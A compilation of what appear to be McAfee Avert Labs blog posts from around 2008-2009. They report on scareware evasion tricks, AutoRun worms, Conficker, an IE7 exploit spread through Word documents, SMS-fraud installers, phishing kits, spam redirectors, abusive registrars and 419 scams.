It has been almost a year since the rogue antivirus products, a.k.a. scareware, became rampant.  These Trojan families are typically spread via Drive by downloads, SEO poisoning, Spam campaigns and clever social engineering.
Having these methods discussed in earlier blogs, today we will look into the protection mechanisms adopted by these fake alerts Trojan families to evade detection from antivirus vendors.

• Code obfuscation using junk instructions

In the above screenshot, lots of junk code is visible between valid instructions. Usage of junk instructions is being used widely across Fake Alert families.

• Fake API calls

The screen shot shows the usage of API called SetArcDirection which is not necessary in the code. These kinds of unnecessary APIs are used by malware to defeat emulation. Sometimes, API calls that don’t exist are also used by these families to check if they are being emulated.

• Customized packer

Lot of fake alert families uses their own custom packers, encryption routines.  Some of the families patch the existing packers.

• Use of XMM and MMX instruction sets

Usage of XMM, MMX and FPU instructions which are not needed in the code along with the other junk code are also utilized by most of the fake alert families.

The techniques discussed above are not something very new and has been used in notable malware. But fake alert Trojans use these evasion techniques to there full potential with every new variant. Just when we thought we’re seeing a decline in adware and spyware – fake alert Trojans families have stepped in to claim the scum of the Internet tag.

Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Inititiative to Fight Cybercrime has been in force for more than a half-year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the offical program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future!

The Swine Flu pill spam has started and it’s taking a few Hollywood stars names in vain. Nothing out of the ordinary with the sites on the far end yet though I do expect Oseltamivir [AKA Tamiflu] will get some extra exposure once the affiliate pill sites are updated.

Subjects:

First US swine flu victims!
US swine flu statistics
Salma Hayek caught swine flu!
Swine flu worldwide!
Swine flu in Hollywood!
Swine flu in USA
Madonna caught swine flu!

Also we’ve noticed domain name registrations mentioning the word swine are up by about 30 times and you can bet your daughters it’s not all going to be “whitehat” SEO.

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is way higher then the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe), MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (pe-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

An innovative social-engineering technique in which the virtual world meets the real world was described recently by SANS analyst Lenny Zeltser. The original post can be found here.

Apparently, yellow fliers were placed on vehicles in a parking lot, and the fliers claimed that the vehicles were in violation of parking regulations. The fliers further stateed that the owner could visit a certain website to get more information and pictures about the offense.

Upon visiting this website, the innocent victims were requested to download a toolbar [PictureSearchToolbar.exe], which claimed to let them search for more pictures of their vehicles. However, what this toolbar really does is download malicious files from the Internet; those files in turn downloaded more malware.

Here’s a screenshot of the website:

McAfee detects the original toolbar [PictureSearchToolbar.exe] as Vundo.dldr!1231E9AC from DAT Version 5516 onward, while the dropped and downloaded files are already detected as Vundo Trojan.

I was dealing with customer escalations the other day and came across this interesting sample. If you believe the filename install_wrar380.exe it would install WinRar on your system, for some reason I didn’t believe it .

Upon execution, the installer displays a EULA. I have copied and pasted some of the detail below:

“THE COST OF EACH SMS FROM THE USER’S MOBILE PHONE IS TWO POUNDS. UNLESS OTHERWISE SPECIFIED, THE DOWNLOAD COST SHALL BE FOUR SMS.
Please read these USAGE CONDITIONS carefully and, if appropriate, use the download service which shall imply the express and complete acceptance of each and every one of these USAGE CONDITIONS. Otherwise, please close this website.
Netlink Network Corp. offers a PREMIUM high speed download service that is efficient and virus free. In exchange, the user shall first send two SMS under the conditions specified in clause 2.2 that defines the commercial conditions of the service”

These two sections really caught my eye. From what I understood I was going to be charged £8 in the form of 4 SMS text messages so that I can download WinRar. Alarm bells started to ring.

I clicked ‘I agree’ and was prompted for a code. To get this code, I would have to send 2 SMS text messages to 78*** (Number has been blanked out for security reasons) with the text body ‘CD’ and I would be charged £3 for each text message. This was different to what the EULA said, but as it was cheaper I wasn’t going to argue. Also note how the text is almost the same color as the background to make it difficult to see.

As I was interested to find out if it really would install WinRar, I went to my local mobile phone store and bought a mobile phone, put £10 on it and sent a text message to the number. To my surprise, I received a text back saying:

“SMS 1/3. Price per SMS: 3 Pounds. Total cost: 9 Pounds.”

It now cost me £9 instead of £6 to download some free software. This was also more than the £8 the EULA said it would cost me. I received a further 2 text messages and the final one was labelled 2/3 even though it was the 3rd. I guess they don’t have QA. You can see the text messages I received below:

I entered the code and clicked on the ‘Install’ button. The software downloaded WinRar and went on to install it for me.

I found the website which the sample came from and it displayed the following text at the bottom of the page:

“This website does not belong to any member´s program. This program should be used based on rules of intellectual property. You may obtain this program for free from the official homepage. Using or applying cracks, serials or keygens is strictly forbidden. This portal will not be held accountable for inappropriate use of the program. Your query has been sent succesfully. You will receive an answer shortly. Thank you for using our services. Due to technical issues, your query could not be sent. We apologize for the inconvenience”.

So they admit that you can download this software for free from its official homepage. They are clearly trying to trick the unsuspecting user to pay for free software.

I thought perhaps they have done this with other free software, I did some investigating and found several other websites which are registered to the same company and they offer several other pieces of free software for the small price of £6 or £9 as I found out.

I found installers for Messenger Plus! Live, WinZip, WinAce, 7Zip and several others. All of these can be downloaded for free from their official sites.

The websites are aimed at English, French and Spanish users. Luckily for our European friends, they can pay for the free software in Euro’s.

While navigating these sites, two different company names kept popping up. Netlink Network Corp and Soletto Group, S.A., I did some quick searching but couldn’t find any details on these companies.

Some of the domains had been registered as recently as late last month, so I believe we are likely to see more pop up.

I pulled all the executables I could find on the websites and added detection as SMSFraud.

Please be on the lookout for these in the future as you don’t want to pay for something which is already free.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Igor Muttik just had a parcel arrive whilst I was nearby. McAfee has just won the Lowest False Alarm Rate award from AV Comparatives for VirusScan.

….I didn’t stay for the speech

For those who do not know, false alarms are caused where an anti-virus product detects a clean file as infected and is something all AV companies try hard to avoid. Recognition that we’ve got the lowest false alarm rate on test is awesome.

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

The codec download site, which is in Latvia, also hosts a number of related sites:

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing

Anybody suffering deja-vous? “/in.cgi should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft word document being sent out to an unsuspecting user.

Upon opening the word document the embedded ActiveX control with the following classid  is instantiated and executed.

• {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace .

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Q: How do you want to build a client base for your phishing kits?
A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

I suspect that this is a shareware-style, lead-generation setup–as the phishing kits appear to be of relatively poor quality. (So poor in fact that I expect the most experienced brands to be sending takedown notices for them before the phishing emails were actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too–I guess they gotta pay the hosting bill somehow!

Kudos to the host in Germany for taking down the site next day; you know who you are.

223ad6770c4ff635083b70391d3c04de Abbey[1].Co.Uk.zip
f34e8ce8e373796a30dc7e0730c4ed9e Bank of Israel (2008).rar
799c1ba68e87a33aa225655931996f1f BankofAmerica[1][1].Com.zip
76282eea7ab203c51b05c660577a4002 Cahoot[1].Co.UK.zip
880a57f271d4d46da92738e3962e49b1 E-Gold[1].Com.zip
fa1a96c0b1927177b2ca2c8bd6c5e970 HSBC[1].Co.Uk(CC Info).zip
376bd1c17baa77a870e12747338fe64a HaliFax[1].Co.Uk.zip
a190290c4643d95fb87537856474e84f LloydsTSB[1].Com.zip
0c23bed37791a123e7635cef153d21f9 MoneyBookers[1][1].Com.zip
c5d10b25075e4298bf098dc253a408e6 New paypal.rar
ad7e3dd00939eb5e8d56092aaa0e24bc Padeel.rar
499626e041c80bdec9f80be29364b1b7 PayPal[1][1].Com(T).zip
5eec8797fc8174bf432ddce192d1b1d4 PayPal[1][1].Com.zip
89e94a1843c25dc6424cf542573a4b01 UsaBank[2008].rar
36be827f4ee6e494ee1935556ab3a2a7 Wachovia[1].Com.zip
e1ba19f799d604656ebd4dd9c8228913 Westren nion 2008.rar
62f99023b12214ecac05cdf0ad0b82fe ibank.barclays.co.uk2008.rar
ee89d38f27deb6c94391c764913d9490 scams-orange.zip
afcef45174c5b1ec54db3e8bccfd285a usa.visa.com.rar
6c9030c9c5af0b9343ef72eb458641fd www.Free.Fr.rar
66671d90a86f618522a64caba5bc91a8 www.ebay.co.uK2008.rar
dbfb0c80bada183e47ae031ebb535116 www.paltalk.com.rar

There is an interesting back story to this incident, too: All roads of further investigation lead back to France. The details of which have been with the national police for some time now (thus the delay in posting).

The casino spammers have been chaining together a lot of link redirectors recently to avoid being taken down by redirector sites checking anti-spam blacklists.

Here is a good example from one of our partner traps of how you go from one of the most popular torrent forums on the web to a Malta-based casino in one click.

This is the URL used in the email and our starting point:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h

Here is the redirection chain:
http://demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 301 Moved Permanently

http://www.demonoid.com/redirect.php?url=http://tinyurl.com/4nr46h
--> 200 OK (and stops if you’re using LWP)

HEADER : Refresh: 0;url=http://tinyurl.com/4nr46h

GET http://www.spinpalace.com/index.asp?a=634991
--> 301 Moved Permanently
(then they hide the affiliate string for some reason)

GET http://www.spinpalace.com/
--> 200 OK

Affiliate 634991, your time is up.

This is not a new trick. Forward-thinking anti-spammers have been reputing against this type of behavior for quite a while, coupled with generic redirector detection. (This mail was three times over our usual deletion threshold.) The issue lies in the fact that some of these links stay alive for days, as it takes a long time and a lot of effort for the redirect sites to clean up the working redirectors. Spammers don’t re-try tricks like this without reason, however.

If any readers are going to be at MAAWG next week, be sure to say “Hi”!
(Slacker Ed. is going too!)

Inspired by Igor’s post (and whilst Terry is dancing in doorways) I’ve taken some time out from my current project and beaten a path through the tangled web of service providers, registrars, resellers and registrants of the domain name system supporting the darker side of the web.

This investigation originally started when Garth from Knujon pointed out that Directi have some shill registrars on their books (Whilst I was enjoying the Kaiser Chiefs @ Rock en Seine in Paris no less). I then read Brian Krebs post about Atrivo being one of the best known dangerous networks around… He finished with a teaser note about ESTDomains. So guessing whats coming next I’m going to jump the inter-networking gymnastics that binds EST with Atrivo/Intercage/(cernel|inhoster)/Etc, privacy services and others and start at the far end of the story and expose a secret about a not-so-little Indian company called Directi and shine a light on the almost invisible but vital service that powers the domain registration core of the largest group(s) of bad-actors on the web today.

Let me provide some bullet points about the Directi Group of companies to get you up to speed.

• Directi are a privately owned Indian company with a reported turnover in excess of $300M USD.
• Directi own LogicBoxes the maker of a product used to manage the registrar relationship with registries.
• Directi own the reseller Resellerclub.com, and the registrar Answerable.com amongst others.
• Directi own skenzo.com a domain typo squatting monetization service.
• Directi’s Logicboxes are responsible for over 3.5M domains, about 45K resellers across 50+ ICANN accredited registrars.
• LogicBoxes has no acceptable use policy (AUP) for their service.

That last point is the weak link in the chain. Directi’s Logicboxes provide domain registration automation services under contract but without an AUP, and to organizations that have an un-holy tie to organised crime at that.

LogicBoxes is a software product or turnkey ASP solution but some simple tests (that I’m deliberately withholding for now) prove that it’s software combined with a backend service and Directi are involved at every stage of the game via it’s service-layer even though it looks on the face of it like they aren’t.

(If you don’t understand the cats-cradle of knotted string that holds the domain name registration system together then blame John Levine as he has admitted it’s all his fault and this slide explains it all, “apparently” ).

So on the the murky world of Registrars also being Resellers and why:
ESTDomains, Dynamic Dolphin, to name but a few are huge Directi resellers, and as ICANN accredited registrars also customers of LogicBoxes too. But as Garths and Brian’s posts show there are also many other “shill” registrars and unanswered questions too. However between them they provide a disproportionate amount of domains that are used for illegal activities and most have a path back to Directi’s logicboxes service. I’d estimate the total to be north of 100,000 domains by now, everything from Social networking spam through illegal pharmaceutical supply to botnet command and control.

There is a metric truckload of publicly available evidence for anyone that still doubts the darkness of their hats take a look at the URIBL listings for the last 5 days for ESTdomains. All the linked domains are sites you do not want to click as they contain spam landing pages, fake anti-mailware, porn with fake codecs amongst other things. Why on earth a legitimate registrar would not monitor uribl’s published information and act on it is completely beyond me.

ICANN don’t help the situation by accrediting registrars without a verifiable legitimate address and well publicized & working contacts. We have procurement and vendor qualification processes that’s a real pain some times excellent IMHO, I’ll ask someone to send them a copy

Our friends at Spamhaus have plenty to say about ESTDomains too on many listings, take a look at their nameserver listings for starters SBL53320 SBL53319. Searching ROKSO will reveal a whole lot more. As for Atrivo, it’s a rats nest of issues; A rats nest that would do well to fall off the internet. For more information on the internet-gymnastics I jumped over take a look at this great pdf from hostexploit.com. Keep in mind though that some of the feeder transit networks may be owned or run by the same gang and just exist for redundancy.

The ESTDomains that I’ve investigated first hand have generally fallen into two camps, one where they are registrar directly and one where PublicDomainRegistry is mentioned in the whois, the latter being the “shill” sorry I mean “white labeled Registrar” for the previously mentioned Directi company “resellerclub dot com“. The fact that PrivacyProtect.org is Directi’s whois privacy service (pasted from here) for resellers just makes matters worse.

Don’t get me wrong, Directi have a clue, register a domain directly with a Directi owned registrar and break the AUP and they will act well as any registrar must. I’m specifically talking about the other services they provide to the criminal corners of the web.

It would appear too that the ESTDomains portfolio has had their privacy protection revoked too, this is definitely a step in the right direction. (Breaking news this evening from El Reg and knujon, nice work guys) However, these guys move pretty fast and recently EST moved their privacy needs to their own protectdetails.com domain.

So finally I have to ask those making money by providing the core services Bhavin Turakhia & Divyank Turakhia from Directi, you clearly know the score, so when will you completely stop supporting the illegal acts of EST, DD and other very obvious darkside entities and kick the bad apples out?

Before anyone from a registry or registrar starts the classic “Smith & Wesson” rant think about this, “Smith and Wesson” don’t sell maps or cars, drive you to the forest, apply your camouflage, help with your ICANN accreditation or load your gun for you

There has been some debate in anti-phishing circles over what a hosting service provider should do when taking down a phishing site. It boils down to one of three basic actions the victims witness.

• Redirect the hits to the brands legitimate site - This in my opinion is a dangerous thing to do on many levels and any brand requesting this action will feature on a follow-up shortly.
• Remove the site and throw the 404 error - Just stopping the site working and having the browser present a standard error is the standard check-box reaction & minimal effort.
• Use the hit as an opportunity for education - This is by far my favored option (even though I’ll play devils advocate when it’s discussed). Once a victim has fallen for a phish email, help them to help themselves in the future with some easy to understand education.

Education has to be appropriate, I’m not suggesting at “click time” is a good time for presenting the user at the Anti Phishing Phil game for instance. (Phil is great though if you’ve never seen it). “In your face” education at click-time is a topic close to the heart of the APWG, they will present their advice on the topic very soon.

So back to the raison d’être of this blog, a 10 gallon hat tip to AT&T for this great vishing takedown. [Listen to the mp3]*. They’ve raised the bar with this one and deserve some hearty kudos. I can’t think of a better way of dealing with a vishing number. The continuous unavailable tone has no place here since it’s easily confused with mis-dialing ^{(Homer mp3)}. They have replaced the disconnected service with a great education statement and sound advice too if the caller thinks that they were a victim.

^{* The quality is much better on the phone, I used our conference bridge to record the example.}

In the United Kingdom the term “Postcode Lottery” refers to situations where public services are available to certain postal districts where these districts are carved up by government authorities according to the first 4 characters of the post code (Our equivalent of the American Zip code*). In densely populated areas it is entirely possible for one end of a street to be lucky in a postcode lottery and the other end to be unlucky.

So, postcode Lotteries in the UK are generally bad news. They always get press attention. For instance the national health service (NHS) local trusts will provide a superior premium drug in one area but not in another creating what is known as a Postcode lottery. Prescription charges is another good example.

The remote money fraudsters are taking a very different view!
According to the bottom-feeders a Postcode Lottery is a competition you can win!

Sample below from my yahoo account. Notice the rotten spelling and the possible macro replacement issues, incidentally we call these PBCAK issues internally (Problem Between Chair And Keyboard)

Subject: National Postcode Lottery

National Postcode Lottery

Attention:-

Winner We bring to your notice the winning letter from Nationale Postcode Lottery {United Kingdom Promotion Company} held on the 8th of May, 2008 through Internet ballot System among 10,000 Microsoft users.Subsequently, your email address attached to ticket number 24.2.6.37.15.45 won contract sum of 800,000.00 Pounds ,winning number 100364,ref number XX/0999/171ESP and BATCH: 1211504/MIU.

We request you to pay serious attention to this notification by contacting the claims department with claim information and procedures of claim.

Mr.Jose Bolton
Tel: +44-871-nnn-0525
Fax: +44-700-nnn-0445
Email:divineagent@sify.com

Congratulations once again from our members of staff and thank you for being part of our promotional program.

Yours Sincerely,
Mrs. Stefian Smith
National Postcode Lottery

—————————————————————–
Find the home of your dreams with eircom net property
Sign up for email alerts now [advert removed]

Hardly a political issue, I’m sure you’ll agree. 419 plain and simple. But we’ve seen that email address a lot recently. Time for a good old fashioned LART’ing!

^{*The full 7 character UK postal code is very accurate, it refers to the handful of mail a postie can deliver, approximately 10 houses or thereabouts.}

Meeting the German participants of the McAfee SPAM Experiment for dinner yesterday turned out to be very interesting and provided some unexpected results. After 14 days living on a Spam-mail diet they are still in good shape. Some are so into it that they even installed SiteAdvisor to find out, in advance, if a site is likely to send you spam when you leave your email address there…

Getting in trouble with the girl-friend for browsing dating web sites while leaving his mail-address for possible use by spammers was one of the less expected (and desired) results.

And then this: Collecting spam through surfing porn sites really does not work! All who tried told me they didn’t receive much spam when leaving their email on such sites. That really was a surprise for me. I would have expected a lot of spam, as there seems to be a fairly obvious link between porn and certain drugs and enhancement pills…

Constantly living in a world full of (empty) promises seems to have some effect as well: “It’s nice sitting here with you, but soon I’ll be hanging out with Tom Cruise and Jessica Alba and I will even get money for it” - it’s amazing what some shady people promise you, just to get your email address and other personal data.

There was some amazement when two participants figured out they had received nearly identical advance-fee scams: One in English, the other one in the Polish language.

Well, I’m sure all participants will have a lot of interesting experiences and stories to share at the end of the experiment and I sincerely hope they manage to stop clicking on all those ‘you are the 100,000,000,000 visitor of this webpage’-banners

Oh, and a last note: If there is one movie you should watch this year, make sure it’s the Futurama: Bender’s Big Score where Spam and Phishing play key elements in the story!!

On the 19th of March 2008 I attended a conference at the Said Business School Oxford University called “ICT Towards low carbon emission”.

Many interesting topics were discussed with regards to the impact that Information Technology has on the consumption of energy and production of CO2. Particular attention was given to the implementation of large data-centres, including the cooling of cabinets of server machines and the utilisation of the respective hardware (storage, processing etc) for a given task. DR. Peter Wagget of IBM Emerging Technology Services was present to discuss new efforts that are put into developing ways to make our machines perform in a more “planet friendly” fashion. Juergen Heidegger, the Director of ICT Infrastructure Products at Fujitsu Siemens Computers presented as well. Martin Chilcott, Founder and CEO of Meltwater Ventures, presented a new approach to social groups on the internet, focusing on “green business innovation” with the, soon to be launched, “2Degrees” g-business network open to participants interested in sharing ideas, products and expertise on anything CO2 friendly.

Two of the most interesting presentations were by Liam Newcombe of the British Computer Society Data Centre Specialist Group and by Daniel Curtis on the Evaluation Lead on the Low Carbon ICT project.

Liam discussed the current situation and possible improvements in Data-centres by making use of better planning and by maximising server throughput. He discussed some very interesting projects such as the Green Grid as well as highlight obvious problems that can no longer be disregarded such as Cooling and use of Air-conditioning systems. Just think that currently with the energy used by just over 100 servers in a poorly designed data-centre you could drive a BMW 750 series approximately 40,000,000 Km, the equivalent of 100 times around the earth or 5 times to the moon … with its air conditioning on!!

Example of the peak consumption of energy using 3 different Data centre approaches over the course of 4 years:

Daniel Curtis discussed a project currently run at the Oxford Environmental Change Institute directed at designing hardware that will enable PCs that are not being used into a much more energy efficient state than current power management solutions are capable of. He also mentioned that the average PC consumes approx. 76W of energy under normal load and approx 114W of energy under full load (for example 100% CPU).

After the conference a thought came to my mind…. Think of a recent outbreak of a well known worm, -STORM-. In only a few days, 1.6 Million PCs were reported to be infected, resulting in compromised machines running well above “normal operation” loads therefore consuming more energy!

Allow me to speculate a little……

The difference between normal load and heavy load is approximately 38 Watts. So if only 50% of the machines infected were running at “heavy load” due to the nature of the exploit hitting them (for example a PUP running fake AV or loads of advertising pop-ups). This would equate to: 900.000 PCs * 38watts = 32,400,000 watts wasted on some malicious application. Of course I am not even considering the amount of energy used by all the routers and network equipment across the globe going crazy dealing with abnormal increase in unwanted traffic.

Without using complex calculation and just to give an impression of what the potential for this wasted energy could be, with the above 32 megawatts I could end up powering my “small” 3 bedroom house for approximately 8 years without having to pay my current electricity supplier and during this time watching a whole load of wide screen TV with a plentiful supply of hot tea.

Efforts in creating awareness for the problem of carbon emission are being made by companies throughout the world more and more and they are starting to show their value. An interesting example is from Google last week. When summertime kicked in they made their well known white homepage dress in black for the occasion. This is because monitors are known to use less energy while using Black versus White screen (approximately 15 watt less).

Here is an example of a “copycat” search engine called “BLACKLE”:

So the moral is pretty simple: I am going to keep a good AV solution on my black desktop to keep my files safe and at the same time make the planet a little greener. Clean surfing folks!!!

Yes, today is April Fool’s Day and the usual pranks are circulated through the net. Some funny. Some not so funny. And some very intriguing ideas.

Offensivecomputing.net, a site dedicated to malware analysis, suddenly looking like one of the current Nuwar Campaigns, was complete with file downloads (though benign ones) that may have left many users staring at their screens. I did not link directly to them, because including links here that result in executables being automatically downloaded is not a good idea (plus it’s their main page, likely to be changed back in some hours).

But the really interesting idea came from Google: An engine to search tomorrows web, today! Finding out what website will sport malicious downloads the next day, knowing what websites will fall victim to the ongoing Mass Hacks (reported on here and most recently by Dancho Danchev) within the next 24 hours……. That would be so priceless!

But then Google took Security Nightmares to a next level with another idea: Sending Email back in time. While that feature would be a Spear Phisher’s dream come true, I am rather happy it’s not real.

One of my roles at McAfee Avert Labs is to take a step back from the day-to-day attacks, and look at the bigger picture. To review threat trends and forecast what’s to come. Some threats such as Web Feed Attacks and IM are more easily defined and quantified. Other threats are a little more abstract after you scratch the surface.

In recent years the infamous “targeted attack” has gained much media attention. We often heard about a “segment” of users being hit, such as Myspace or Facebook users. I recall snickering the first time I heard a report stating that “home users” were the most targeted of all. I suppose next we’ll hear that Internet users are the most targeted.

So what does the word targeted in targeted attack really mean? One could argue that anyone hit with an attack that was sent to him or her specifically (as in: the email message containing the virus was sent to your address) was a victim of a targeted attack, but that definition is way too broad, as the vast majority of all attacks would then be considered targeted. I pondered the definition of targeted attacks for a bit, trying to think of a simple yet concrete definition. I landed on the work discrimination. For me the key aspect of any targeted attack is that it must discriminate, otherwise the attack is either random, or one of opportunity.

